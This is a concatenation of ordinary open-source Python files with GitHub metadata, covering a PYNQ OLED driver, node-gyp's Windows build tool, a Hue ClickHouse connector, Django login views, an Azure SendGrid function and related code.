"""Draw a straight line on the OLED.
Parameters
----------
x1 : int
The x-position of the starting point.
y1 : int
The y-position of the starting point.
x2 : int
The x-position of the ending point.
y2 : int
The y-position of the ending point.
Returns
-------
None
"""
if not 0 <= x1 <= 255:
raise ValueError("X-position should be in [0, 255]")
if not 0 <= x2 <= 255:
raise ValueError("X-position should be in [0, 255]")
if not 0 <= y1 <= 255:
raise ValueError("Y-position should be in [0, 255]")
if not 0 <= y2 <= 255:
raise ValueError("Y-position should be in [0, 255]")
self.microblaze.write_mailbox(0, [x1, y1, x2, y2])
self.microblaze.write_blocking_command(DRAW_LINE)
def draw_rect(self, x1, y1, x2, y2):
"""Draw a rectangle on the OLED.
Parameters
----------
x1 : int
The x-position of the starting point.
y1 : int
The y-position of the starting point.
x2 : int
The x-position of the ending point.
y2 : int
The y-position of the ending point.
Returns
-------
None
"""
if not 0 <= x1 <= 255:
raise ValueError("X-position should be in [0, 255]")
if not 0 <= x2 <= 255:
raise ValueError("X-position should be in [0, 255]")
if not 0 <= y1 <= 255:
raise ValueError("Y-position should be in [0, 255]")
if not 0 <= y2 <= 255:
raise ValueError("Y-position should be in [0, 255]")
self.microblaze.write_mailbox(0, [x1, y1, x2, y2])
self.microblaze.write_blocking_command(DRAW_RECT)
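# A minimal usage sketch, not part of the original module and never called
# here. BaseOverlay and PMODA are assumptions about the surrounding PYNQ API
# and board setup; adjust them to the overlay and Pmod port actually in use.
def _example_usage():
    from pynq.overlays.base import BaseOverlay
    from pynq.lib.pmod import Pmod_OLED, PMODA
    BaseOverlay("base.bit")  # download the base overlay first
    oled = Pmod_OLED(PMODA, text="Hello, PYNQ!")
    oled.draw_line(0, 0, 127, 31)
    oled.draw_rect(10, 5, 100, 25)
    oled.clear()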
| {
"content_hash": "14832756aa0e1fee3686a91b254c1bbb",
"timestamp": "",
"source": "github",
"line_count": 150,
"max_line_length": 77,
"avg_line_length": 27.813333333333333,
"alnum_prop": 0.5141418983700863,
"repo_name": "Xilinx/PYNQ",
"id": "2891fa64ca0375b5ff49c169ca047b46df33144c",
"size": "4253",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "pynq/lib/pmod/pmod_oled.py",
"mode": "33261",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "51"
},
{
"name": "BitBake",
"bytes": "1840"
},
{
"name": "C",
"bytes": "1062607"
},
{
"name": "C++",
"bytes": "76769"
},
{
"name": "CMake",
"bytes": "578"
},
{
"name": "JavaScript",
"bytes": "239958"
},
{
"name": "Jupyter Notebook",
"bytes": "17148467"
},
{
"name": "Makefile",
"bytes": "165279"
},
{
"name": "Python",
"bytes": "1388540"
},
{
"name": "Shell",
"bytes": "67192"
},
{
"name": "SystemVerilog",
"bytes": "53374"
},
{
"name": "Tcl",
"bytes": "1383109"
},
{
"name": "VHDL",
"bytes": "738710"
},
{
"name": "Verilog",
"bytes": "284588"
}
],
"symlink_target": ""
} |
"""Utility functions for Windows builds.
These functions are executed via gyp-win-tool when using the ninja generator.
"""
from __future__ import print_function
import os
import re
import shutil
import subprocess
import stat
import string
import sys
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
# A regex matching an argument corresponding to the output filename passed to
# link.exe.
_LINK_EXE_OUT_ARG = re.compile('/OUT:(?P<out>.+)$', re.IGNORECASE)
def main(args):
executor = WinTool()
exit_code = executor.Dispatch(args)
if exit_code is not None:
sys.exit(exit_code)
class WinTool(object):
"""This class performs all the Windows tooling steps. The methods can either
be executed directly, or dispatched from an argument list."""
def _UseSeparateMspdbsrv(self, env, args):
"""Allows to use a unique instance of mspdbsrv.exe per linker instead of a
shared one."""
if len(args) < 1:
raise Exception("Not enough arguments")
if args[0] != 'link.exe':
return
# Use the output filename passed to the linker to generate an endpoint name
# for mspdbsrv.exe.
endpoint_name = None
for arg in args:
m = _LINK_EXE_OUT_ARG.match(arg)
if m:
endpoint_name = re.sub(r'\W+', '',
'%s_%d' % (m.group('out'), os.getpid()))
break
if endpoint_name is None:
return
# Adds the appropriate environment variable. This will be read by link.exe
# to know which instance of mspdbsrv.exe it should connect to (if it's
# not set then the default endpoint is used).
env['_MSPDBSRV_ENDPOINT_'] = endpoint_name
def Dispatch(self, args):
"""Dispatches a string command to a method."""
if len(args) < 1:
raise Exception("Not enough arguments")
method = "Exec%s" % self._CommandifyName(args[0])
return getattr(self, method)(*args[1:])
def _CommandifyName(self, name_string):
"""Transforms a tool name like recursive-mirror to RecursiveMirror."""
return name_string.title().replace('-', '')
def _GetEnv(self, arch):
"""Gets the saved environment from a file for a given architecture."""
# The environment is saved as an "environment block" (see CreateProcess
# and msvs_emulation for details). We convert to a dict here.
# Drop last 2 NULs, one for list terminator, one for trailing vs. separator.
pairs = open(arch).read()[:-2].split('\0')
kvs = [item.split('=', 1) for item in pairs]
return dict(kvs)
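  # Illustration, not part of the original tool (paths made up): a saved
  # environment block that reads 'PATH=C:\tools\x00TMP=C:\temp\x00\x00'
  # is parsed by _GetEnv() above into {'PATH': 'C:\tools', 'TMP': 'C:\temp'}.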
def ExecStamp(self, path):
"""Simple stamp command."""
open(path, 'w').close()
def ExecRecursiveMirror(self, source, dest):
"""Emulation of rm -rf out && cp -af in out."""
if os.path.exists(dest):
if os.path.isdir(dest):
def _on_error(fn, path, excinfo):
# The operation failed, possibly because the file is set to
# read-only. If that's why, make it writable and try the op again.
if not os.access(path, os.W_OK):
os.chmod(path, stat.S_IWRITE)
fn(path)
shutil.rmtree(dest, onerror=_on_error)
else:
if not os.access(dest, os.W_OK):
# Attempt to make the file writable before deleting it.
os.chmod(dest, stat.S_IWRITE)
os.unlink(dest)
if os.path.isdir(source):
shutil.copytree(source, dest)
else:
shutil.copy2(source, dest)
def ExecLinkWrapper(self, arch, use_separate_mspdbsrv, *args):
"""Filter diagnostic output from link that looks like:
' Creating library ui.dll.lib and object ui.dll.exp'
This happens when there are exports from the dll or exe.
"""
env = self._GetEnv(arch)
if use_separate_mspdbsrv == 'True':
self._UseSeparateMspdbsrv(env, args)
link = subprocess.Popen([args[0].replace('/', '\\')] + list(args[1:]),
shell=True,
env=env,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
out, _ = link.communicate()
for line in out.splitlines():
if (not line.startswith(' Creating library ') and
not line.startswith('Generating code') and
not line.startswith('Finished generating code')):
print(line)
return link.returncode
def ExecLinkWithManifests(self, arch, embed_manifest, out, ldcmd, resname,
mt, rc, intermediate_manifest, *manifests):
"""A wrapper for handling creating a manifest resource and then executing
a link command."""
# The 'normal' way to do manifests is to have link generate a manifest
# based on gathering dependencies from the object files, then merge that
# manifest with other manifests supplied as sources, convert the merged
# manifest to a resource, and then *relink*, including the compiled
# version of the manifest resource. This breaks incremental linking, and
# is generally overly complicated. Instead, we merge all the manifests
# provided (along with one that includes what would normally be in the
# linker-generated one, see msvs_emulation.py), and include that into the
# first and only link. We still tell link to generate a manifest, but we
# only use that to assert that our simpler process did not miss anything.
variables = {
'python': sys.executable,
'arch': arch,
'out': out,
'ldcmd': ldcmd,
'resname': resname,
'mt': mt,
'rc': rc,
'intermediate_manifest': intermediate_manifest,
'manifests': ' '.join(manifests),
}
add_to_ld = ''
if manifests:
subprocess.check_call(
'%(python)s gyp-win-tool manifest-wrapper %(arch)s %(mt)s -nologo '
'-manifest %(manifests)s -out:%(out)s.manifest' % variables)
if embed_manifest == 'True':
subprocess.check_call(
'%(python)s gyp-win-tool manifest-to-rc %(arch)s %(out)s.manifest'
' %(out)s.manifest.rc %(resname)s' % variables)
subprocess.check_call(
'%(python)s gyp-win-tool rc-wrapper %(arch)s %(rc)s '
'%(out)s.manifest.rc' % variables)
add_to_ld = ' %(out)s.manifest.res' % variables
subprocess.check_call(ldcmd + add_to_ld)
# Run mt.exe on the theoretically complete manifest we generated, merging
# it with the one the linker generated to confirm that the linker
# generated one does not add anything. This is strictly unnecessary for
# correctness, it's only to verify that e.g. /MANIFESTDEPENDENCY was not
# used in a #pragma comment.
if manifests:
# Merge the intermediate one with ours to .assert.manifest, then check
# that .assert.manifest is identical to ours.
subprocess.check_call(
'%(python)s gyp-win-tool manifest-wrapper %(arch)s %(mt)s -nologo '
'-manifest %(out)s.manifest %(intermediate_manifest)s '
'-out:%(out)s.assert.manifest' % variables)
assert_manifest = '%(out)s.assert.manifest' % variables
our_manifest = '%(out)s.manifest' % variables
# Load and normalize the manifests. mt.exe sometimes removes whitespace,
# and sometimes doesn't unfortunately.
with open(our_manifest, 'rb') as our_f:
with open(assert_manifest, 'rb') as assert_f:
our_data = our_f.read().translate(None, string.whitespace)
assert_data = assert_f.read().translate(None, string.whitespace)
if our_data != assert_data:
os.unlink(out)
def dump(filename):
sys.stderr.write('%s\n-----\n' % filename)
with open(filename, 'rb') as f:
sys.stderr.write(f.read() + '\n-----\n')
dump(intermediate_manifest)
dump(our_manifest)
dump(assert_manifest)
sys.stderr.write(
'Linker generated manifest "%s" added to final manifest "%s" '
'(result in "%s"). '
'Were /MANIFEST switches used in #pragma statements? ' % (
intermediate_manifest, our_manifest, assert_manifest))
return 1
def ExecManifestWrapper(self, arch, *args):
"""Run manifest tool with environment set. Strip out undesirable warning
(some XML blocks are recognized by the OS loader, but not the manifest
tool)."""
env = self._GetEnv(arch)
popen = subprocess.Popen(args, shell=True, env=env,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out, _ = popen.communicate()
for line in out.splitlines():
if line and 'manifest authoring warning 81010002' not in line:
print(line)
return popen.returncode
def ExecManifestToRc(self, arch, *args):
"""Creates a resource file pointing a SxS assembly manifest.
|args| is tuple containing path to resource file, path to manifest file
and resource name which can be "1" (for executables) or "2" (for DLLs)."""
manifest_path, resource_path, resource_name = args
with open(resource_path, 'wb') as output:
output.write('#include <windows.h>\n%s RT_MANIFEST "%s"' % (
resource_name,
os.path.abspath(manifest_path).replace('\\', '/')))
def ExecMidlWrapper(self, arch, outdir, tlb, h, dlldata, iid, proxy, idl,
*flags):
"""Filter noisy filenames output from MIDL compile step that isn't
quietable via command line flags.
"""
args = ['midl', '/nologo'] + list(flags) + [
'/out', outdir,
'/tlb', tlb,
'/h', h,
'/dlldata', dlldata,
'/iid', iid,
'/proxy', proxy,
idl]
env = self._GetEnv(arch)
popen = subprocess.Popen(args, shell=True, env=env,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out, _ = popen.communicate()
# Filter junk out of stdout, and write filtered versions. Output we want
# to filter is pairs of lines that look like this:
# Processing C:\Program Files (x86)\Microsoft SDKs\...\include\objidl.idl
# objidl.idl
lines = out.splitlines()
prefixes = ('Processing ', '64 bit Processing ')
processing = set(os.path.basename(x)
for x in lines if x.startswith(prefixes))
for line in lines:
if not line.startswith(prefixes) and line not in processing:
print(line)
return popen.returncode
def ExecAsmWrapper(self, arch, *args):
"""Filter logo banner from invocations of asm.exe."""
env = self._GetEnv(arch)
popen = subprocess.Popen(args, shell=True, env=env,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out, _ = popen.communicate()
for line in out.splitlines():
if (not line.startswith('Copyright (C) Microsoft Corporation') and
not line.startswith('Microsoft (R) Macro Assembler') and
not line.startswith(' Assembling: ') and
line):
print(line)
return popen.returncode
def ExecRcWrapper(self, arch, *args):
"""Filter logo banner from invocations of rc.exe. Older versions of RC
don't support the /nologo flag."""
env = self._GetEnv(arch)
popen = subprocess.Popen(args, shell=True, env=env,
stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out, _ = popen.communicate()
for line in out.splitlines():
if (not line.startswith('Microsoft (R) Windows (R) Resource Compiler') and
not line.startswith('Copyright (C) Microsoft Corporation') and
line):
print(line)
return popen.returncode
def ExecActionWrapper(self, arch, rspfile, *dir):
"""Runs an action command line from a response file using the environment
for |arch|. If |dir| is supplied, use that as the working directory."""
env = self._GetEnv(arch)
# TODO(scottmg): This is a temporary hack to get some specific variables
# through to actions that are set after gyp-time. http://crbug.com/333738.
for k, v in os.environ.items():
if k not in env:
env[k] = v
args = open(rspfile).read()
dir = dir[0] if dir else None
return subprocess.call(args, shell=True, env=env, cwd=dir)
def ExecClCompile(self, project_dir, selected_files):
"""Executed by msvs-ninja projects when the 'ClCompile' target is used to
build selected C/C++ files."""
project_dir = os.path.relpath(project_dir, BASE_DIR)
selected_files = selected_files.split(';')
ninja_targets = [os.path.join(project_dir, filename) + '^^'
for filename in selected_files]
cmd = ['ninja.exe']
cmd.extend(ninja_targets)
return subprocess.call(cmd, shell=True, cwd=BASE_DIR)
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
| {
"content_hash": "74d5b16b5e278bf2941c4c54a2ce8f06",
"timestamp": "",
"source": "github",
"line_count": 310,
"max_line_length": 80,
"avg_line_length": 40.68064516129032,
"alnum_prop": 0.6346840060264848,
"repo_name": "refack/node-gyp",
"id": "bca0b9e346a5ba0763c044e9480248c42e9e65e3",
"size": "12791",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "gyp/pylib/gyp/win_tool.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "397"
},
{
"name": "C#",
"bytes": "9566"
},
{
"name": "C++",
"bytes": "1475"
},
{
"name": "Emacs Lisp",
"bytes": "14357"
},
{
"name": "JavaScript",
"bytes": "116850"
},
{
"name": "Python",
"bytes": "1246997"
},
{
"name": "Shell",
"bytes": "7180"
}
],
"symlink_target": ""
} |
from librdbms.jdbc import query_and_fetch
from notebook.connectors.jdbc import JdbcApi
from notebook.connectors.jdbc import Assist
class JdbcApiClickhouse(JdbcApi):
def _createAssist(self, db):
return ClickhouseAssist(db)
class ClickhouseAssist(Assist):
def get_databases(self):
dbs, description = query_and_fetch(self.db, 'SHOW DATABASES')
return [db[0] and db[0].strip() for db in dbs]
def get_tables_full(self, database, table_names=[]):
tables, description = query_and_fetch(self.db, "SELECT name, '' FROM system.tables WHERE database='%s'" % database)
return [{"comment": table[1] and table[1].strip(), "type": "Table", "name": table[0] and table[0].strip()} for table in tables]
def get_columns_full(self, database, table):
columns, description = query_and_fetch(self.db, "SELECT name, type, '' FROM system.columns WHERE database='%s' AND table = '%s'" % (database, table))
return [{"comment": col[2] and col[2].strip(), "type": col[1], "name": col[0] and col[0].strip()} for col in columns]
def get_sample_data(self, database, table, column=None):
column = column or '*'
return query_and_fetch(self.db, 'SELECT %s FROM %s.%s limit 100' % (column, database, table))
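# Illustration, not part of the original connector: the queries above as they
# would be sent to ClickHouse for a database named "default" and a table
# named "visits" (both names made up).
#
#   SHOW DATABASES
#   SELECT name, '' FROM system.tables WHERE database='default'
#   SELECT name, type, '' FROM system.columns WHERE database='default' AND table = 'visits'
#   SELECT * FROM default.visits limit 100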
| {
"content_hash": "c2697962380bea0bb8232bfabc39a03e",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 153,
"avg_line_length": 47.11538461538461,
"alnum_prop": 0.6889795918367347,
"repo_name": "cloudera/hue",
"id": "0d16abb485d32c56cb1d8d0c2b6ada9c1a66f0f8",
"size": "2017",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "desktop/libs/notebook/src/notebook/connectors/jdbc_clickhouse.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ABAP",
"bytes": "962"
},
{
"name": "ActionScript",
"bytes": "1133"
},
{
"name": "Ada",
"bytes": "99"
},
{
"name": "Assembly",
"bytes": "2347"
},
{
"name": "AutoHotkey",
"bytes": "720"
},
{
"name": "BASIC",
"bytes": "2884"
},
{
"name": "Batchfile",
"bytes": "143575"
},
{
"name": "C",
"bytes": "5129166"
},
{
"name": "C#",
"bytes": "83"
},
{
"name": "C++",
"bytes": "718011"
},
{
"name": "COBOL",
"bytes": "4"
},
{
"name": "CSS",
"bytes": "680715"
},
{
"name": "Cirru",
"bytes": "520"
},
{
"name": "Clojure",
"bytes": "794"
},
{
"name": "Closure Templates",
"bytes": "1072"
},
{
"name": "CoffeeScript",
"bytes": "403"
},
{
"name": "ColdFusion",
"bytes": "86"
},
{
"name": "Common Lisp",
"bytes": "632"
},
{
"name": "Cython",
"bytes": "1016963"
},
{
"name": "D",
"bytes": "324"
},
{
"name": "Dart",
"bytes": "489"
},
{
"name": "Dockerfile",
"bytes": "13576"
},
{
"name": "EJS",
"bytes": "752"
},
{
"name": "Eiffel",
"bytes": "375"
},
{
"name": "Elixir",
"bytes": "692"
},
{
"name": "Elm",
"bytes": "487"
},
{
"name": "Emacs Lisp",
"bytes": "411907"
},
{
"name": "Erlang",
"bytes": "487"
},
{
"name": "Forth",
"bytes": "979"
},
{
"name": "FreeMarker",
"bytes": "1017"
},
{
"name": "G-code",
"bytes": "521"
},
{
"name": "GAP",
"bytes": "29873"
},
{
"name": "GLSL",
"bytes": "512"
},
{
"name": "Genshi",
"bytes": "946"
},
{
"name": "Gherkin",
"bytes": "699"
},
{
"name": "Go",
"bytes": "641"
},
{
"name": "Groovy",
"bytes": "1080"
},
{
"name": "HTML",
"bytes": "28328425"
},
{
"name": "Haml",
"bytes": "920"
},
{
"name": "Handlebars",
"bytes": "173"
},
{
"name": "Haskell",
"bytes": "512"
},
{
"name": "Haxe",
"bytes": "447"
},
{
"name": "HiveQL",
"bytes": "43"
},
{
"name": "Io",
"bytes": "140"
},
{
"name": "Java",
"bytes": "457398"
},
{
"name": "JavaScript",
"bytes": "39181239"
},
{
"name": "Jinja",
"bytes": "356"
},
{
"name": "Julia",
"bytes": "210"
},
{
"name": "LSL",
"bytes": "2080"
},
{
"name": "Lean",
"bytes": "213"
},
{
"name": "Less",
"bytes": "396102"
},
{
"name": "Lex",
"bytes": "218764"
},
{
"name": "Liquid",
"bytes": "1883"
},
{
"name": "LiveScript",
"bytes": "5747"
},
{
"name": "Lua",
"bytes": "78382"
},
{
"name": "M4",
"bytes": "1751"
},
{
"name": "MATLAB",
"bytes": "203"
},
{
"name": "Makefile",
"bytes": "1025937"
},
{
"name": "Mako",
"bytes": "3644004"
},
{
"name": "Mask",
"bytes": "597"
},
{
"name": "Myghty",
"bytes": "936"
},
{
"name": "Nix",
"bytes": "2212"
},
{
"name": "OCaml",
"bytes": "539"
},
{
"name": "Objective-C",
"bytes": "2672"
},
{
"name": "OpenSCAD",
"bytes": "333"
},
{
"name": "PHP",
"bytes": "662"
},
{
"name": "PLSQL",
"bytes": "29403"
},
{
"name": "PLpgSQL",
"bytes": "6006"
},
{
"name": "Pascal",
"bytes": "84273"
},
{
"name": "Perl",
"bytes": "4327"
},
{
"name": "PigLatin",
"bytes": "371"
},
{
"name": "PowerShell",
"bytes": "6235"
},
{
"name": "Procfile",
"bytes": "47"
},
{
"name": "Pug",
"bytes": "584"
},
{
"name": "Python",
"bytes": "92881549"
},
{
"name": "R",
"bytes": "2445"
},
{
"name": "Roff",
"bytes": "484108"
},
{
"name": "Ruby",
"bytes": "1098"
},
{
"name": "Rust",
"bytes": "495"
},
{
"name": "SCSS",
"bytes": "78508"
},
{
"name": "Sass",
"bytes": "770"
},
{
"name": "Scala",
"bytes": "1541"
},
{
"name": "Scheme",
"bytes": "559"
},
{
"name": "Shell",
"bytes": "249165"
},
{
"name": "Smarty",
"bytes": "130"
},
{
"name": "SourcePawn",
"bytes": "948"
},
{
"name": "Stylus",
"bytes": "682"
},
{
"name": "Tcl",
"bytes": "899"
},
{
"name": "TeX",
"bytes": "165743"
},
{
"name": "Thrift",
"bytes": "341963"
},
{
"name": "Twig",
"bytes": "761"
},
{
"name": "TypeScript",
"bytes": "1241396"
},
{
"name": "VBScript",
"bytes": "938"
},
{
"name": "VHDL",
"bytes": "830"
},
{
"name": "Vala",
"bytes": "485"
},
{
"name": "Verilog",
"bytes": "274"
},
{
"name": "Vim Snippet",
"bytes": "226931"
},
{
"name": "Vue",
"bytes": "350385"
},
{
"name": "XQuery",
"bytes": "114"
},
{
"name": "XSLT",
"bytes": "522199"
},
{
"name": "Yacc",
"bytes": "1070437"
},
{
"name": "jq",
"bytes": "4"
}
],
"symlink_target": ""
} |
from functionaltests.api import base
class VersionDiscoveryTestCase(base.TestCase):
def test_version_get_as_unauthenticated(self):
"""Covers retrieving version as unauthenticated user."""
self._do_version_test(use_auth=False)
def test_version_get_as_authenticated(self):
"""Covers retrieving version as authenticated user."""
self._do_version_test(use_auth=True)
def _do_version_test(self, use_auth=False):
"""Get version string with or without authentication.
:param use_auth: True to use authentication, False otherwise. Default
is False
"""
url_without_version = self.client.get_base_url(include_version=False)
resp = self.client.get(url_without_version, use_auth=use_auth)
body = resp.json()
self.assertEqual(300, resp.status_code)
versions_response = body['versions']['values']
v1_info = versions_response[0]
# NOTE(jaosorior): I used assertIn instead of assertEqual because we
# might start using decimal numbers in the future. So when that happens
# this test will still be valid.
self.assertIn('v1', v1_info['id'])
self.assertEqual(1, len(v1_info['media-types']))
self.assertEqual('application/json', v1_info['media-types'][0]['base'])
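# Illustration, not part of the original test: the minimal shape of the
# version document the assertions above rely on. Only the fields asserted on
# are shown; any other keys in the real response are omitted here.
#
# {
#   "versions": {
#     "values": [
#       {"id": "v1", "media-types": [{"base": "application/json"}]}
#     ]
#   }
# }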
| {
"content_hash": "58446df4a3300309e191e8487067f84c",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 79,
"avg_line_length": 40.15151515151515,
"alnum_prop": 0.6618867924528302,
"repo_name": "openstack/barbican",
"id": "3501b4dcf5887f68359c3ebe7ebdee2f895a3029",
"size": "1909",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "functionaltests/api/v1/smoke/test_versions.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "API Blueprint",
"bytes": "1586"
},
{
"name": "Mako",
"bytes": "979"
},
{
"name": "Python",
"bytes": "2626403"
},
{
"name": "Shell",
"bytes": "43567"
}
],
"symlink_target": ""
} |
"""Maps package for VisTrails.
This package uses the Google Maps API to display information using
Qt's WebKit in the spreadsheet.
"""
# 2014-02-04 -- 0.1.0
# * Package created (from existing local work from 2013)
from __future__ import division
from identifiers import *
def package_dependencies():
return ['org.vistrails.vistrails.tabledata',
'org.vistrails.vistrails.spreadsheet']
| {
"content_hash": "cb49ffede0d46d57c5858bd631945cc1",
"timestamp": "",
"source": "github",
"line_count": 19,
"max_line_length": 66,
"avg_line_length": 21.526315789473685,
"alnum_prop": 0.7163814180929096,
"repo_name": "VisTrails/VisTrails",
"id": "2ab5042d74a64b99af7012ef44713f7e5edd06d8",
"size": "2323",
"binary": false,
"copies": "2",
"ref": "refs/heads/v2.2",
"path": "vistrails/packages/gmaps/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1129"
},
{
"name": "Makefile",
"bytes": "768"
},
{
"name": "Mako",
"bytes": "66613"
},
{
"name": "PHP",
"bytes": "49302"
},
{
"name": "Python",
"bytes": "19779006"
},
{
"name": "R",
"bytes": "782836"
},
{
"name": "Ruby",
"bytes": "875"
},
{
"name": "SQLPL",
"bytes": "2323"
},
{
"name": "Shell",
"bytes": "26542"
},
{
"name": "TeX",
"bytes": "147247"
},
{
"name": "XSLT",
"bytes": "1090"
}
],
"symlink_target": ""
} |
"""
Azure Functions Queue Trigger Python Sample that send email by using SendGrid bindings.
SendGrid binding reference:
https://docs.microsoft.com/en-us/azure/azure-functions/functions-bindings-sendgrid
"""
import os, json
_AZURE_FUNCTION_QUEUE_INPUT_ENV_NAME = "inputMessage"
_AZURE_FUNCTION_SENDGRID_OUTPUT_ENV_NAME = "outputMessage"
_SENDGRID_EMAIL_TO = "[email protected]"
_SENDGRID_EMAIL_SUBJECT = "Mail Subject"
# read the queue message
messageText = open(os.environ[_AZURE_FUNCTION_QUEUE_INPUT_ENV_NAME]).read()
print("Function script processed queue message '{0}'".format(messageText))
outmsg={
"personalizations": [
{
"to": [{ "email": _SENDGRID_EMAIL_TO }]
}
],
"subject": _SENDGRID_EMAIL_SUBJECT,
"content": [
{
"type": 'text/plain',
"value": messageText
}
]
}
# Send email using SendGrid (output name: outputMessage)
print('Sending email using SendGrid:', outmsg)
with open(os.environ[_AZURE_FUNCTION_SENDGRID_OUTPUT_ENV_NAME], 'wb') as f:
json.dump(outmsg,f)
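# Illustration, not part of this script: the function.json bindings this
# sample assumes -- a queue trigger named "inputMessage" and a SendGrid output
# named "outputMessage". The queue name, connection and apiKey settings below
# are placeholders and depend on the actual Function App configuration.
#
# {
#   "bindings": [
#     {"name": "inputMessage", "type": "queueTrigger", "direction": "in",
#      "queueName": "myqueue", "connection": "AzureWebJobsStorage"},
#     {"name": "outputMessage", "type": "sendGrid", "direction": "out",
#      "apiKey": "SendGridApiKey"}
#   ]
# }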
| {
"content_hash": "3c0f56c0932419477b2b908a070bf4c1",
"timestamp": "",
"source": "github",
"line_count": 37,
"max_line_length": 87,
"avg_line_length": 29.054054054054053,
"alnum_prop": 0.6753488372093023,
"repo_name": "yokawasa/azure-functions-python-samples",
"id": "b7760023ce979f926727bf6b11189b88d4d7e910",
"size": "1099",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "v1functions/queue-trigger-sendgrid/function/run.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Dockerfile",
"bytes": "206"
},
{
"name": "HTML",
"bytes": "95"
},
{
"name": "Python",
"bytes": "43036"
},
{
"name": "Shell",
"bytes": "18052"
}
],
"symlink_target": ""
} |
import json
# django imports
from django.contrib.auth import authenticate, login, logout
#from django.contrib.auth.views import authenticate, login, logout
from django.shortcuts import render_to_response, RequestContext, HttpResponse, redirect
from django.core.urlresolvers import reverse
from django import forms
from django.utils.translation import ugettext_lazy as _
from django.contrib.auth.forms import AuthenticationForm
# local imports
from forms import CustomUserCreationForm, LoginUsernameForm
def home(request):
return HttpResponse("This is the opend_id target for MM. Please specify a url like: id.mm.is/USERNAME ")
def create(request):
"""
"""
print "inside create"
if request.method == 'POST': # If the form has been submitted...
form = CustomUserCreationForm(request.POST) # A form bound to the POST data
if form.is_valid(): # All validation rules pass
print "form is valid"
# CreatingUser
# ...
user = form.save(commit=True)
password = form.cleaned_data['password1']
# request.POST['password1'] = request.POST['password2']
auth_user = authenticate(username=user.username, password=password)
if auth_user is not None:
login(request, auth_user)
if user.first_name and user.last_name:
response_data = {
"username": user.username,
"email": user.email,
"first_name": user.first_name,
"last_name": user.last_name,
}
else:
response_data = {
"username": user.username,
"email": user.email,
}
return HttpResponse(json.dumps(response_data), content_type="application/json")
else:
response_data = {
"err": dict(form.errors.items())
}
return HttpResponse(json.dumps(response_data), content_type="application/json")
#return redirect("mm_login")
#return HttpResponse("Got User form, user is %s" % user.username)
#return HttpResponseRedirect('/thanks/') # Redirect after POST
else:
form = CustomUserCreationForm() # An unbound form
return render_to_response('registration/create.html', {
'form': form},
context_instance = RequestContext(request)
)
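# Illustrative request/response sketch for the create view above (added; the URL
# used here is an assumption, not taken from this file):
#   POST /users/create/ with the CustomUserCreationForm fields
#     -> 200 {"username": "...", "email": "...",
#             "first_name": "...", "last_name": "..."}    # names set on the form
#     -> 200 {"username": "...", "email": "..."}          # names left blank
#     -> 200 {"err": {"<field>": ["<message>", ...]}}     # validation failure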
def mm_login(request):
"""
Login function
"""
if request.method == 'POST':
login_form = LoginUsernameForm(request.POST)
if login_form.is_valid():
username = login_form.cleaned_data['username']
password = login_form.cleaned_data['password']
user = authenticate(username=username, password=password)
if user is not None:
login(request, user)
if user.first_name and user.last_name:
response_data = {
"username": user.username,
"email": user.email,
"first_name": user.first_name,
"last_name": user.last_name,
}
else:
response_data = {
"username": user.username,
"email": user.email,
}
return HttpResponse(json.dumps(response_data), content_type="application/json")
else:
response_data = {
"err": "Your username and password didn't match. Please try again."
}
return HttpResponse(json.dumps(response_data), content_type="application/json")
else:
login_form = LoginUsernameForm()
context = {
"form": login_form,
}
return render_to_response('registration/login.html', context, RequestContext(request))
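# Illustrative response sketch for mm_login above (added; the URL is an
# assumption, not taken from this file):
#   POST /users/login/ with {"username": ..., "password": ...}
#     -> 200 {"username": "...", "email": "...", ...}                 # authenticated
#     -> 200 {"err": "Your username and password didn't match. ..."}  # bad credentials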
| {
"content_hash": "580acf10136e4af5c65a78e70e1506e4",
"timestamp": "",
"source": "github",
"line_count": 99,
"max_line_length": 109,
"avg_line_length": 40.43434343434343,
"alnum_prop": 0.5578316262802898,
"repo_name": "Bergurth/new-openid-server",
"id": "1b7a4357ae1c844e7057fb9517688b46b43b8c4f",
"size": "4084",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "openid_1_8/users/views.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "2644"
},
{
"name": "Python",
"bytes": "13689"
}
],
"symlink_target": ""
} |
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class nsip6(base_resource) :
""" Configuration for ip6 resource. """
def __init__(self) :
self._ipv6address = ""
self._scope = ""
self._type = ""
self._vlan = 0
self._nd = ""
self._icmp = ""
self._vserver = ""
self._telnet = ""
self._ftp = ""
self._gui = ""
self._ssh = ""
self._snmp = ""
self._mgmtaccess = ""
self._restrictaccess = ""
self._dynamicrouting = ""
self._hostroute = ""
self._ip6hostrtgw = ""
self._metric = 0
self._vserverrhilevel = ""
self._ospf6lsatype = ""
self._ospfarea = 0
self._state = ""
self._map = ""
self._ownernode = 0
self._td = 0
self._iptype = []
self._curstate = ""
self._viprtadv2bsd = False
self._vipvsercount = 0
self._vipvserdowncount = 0
self._systemtype = ""
self.___count = 0
@property
def ipv6address(self) :
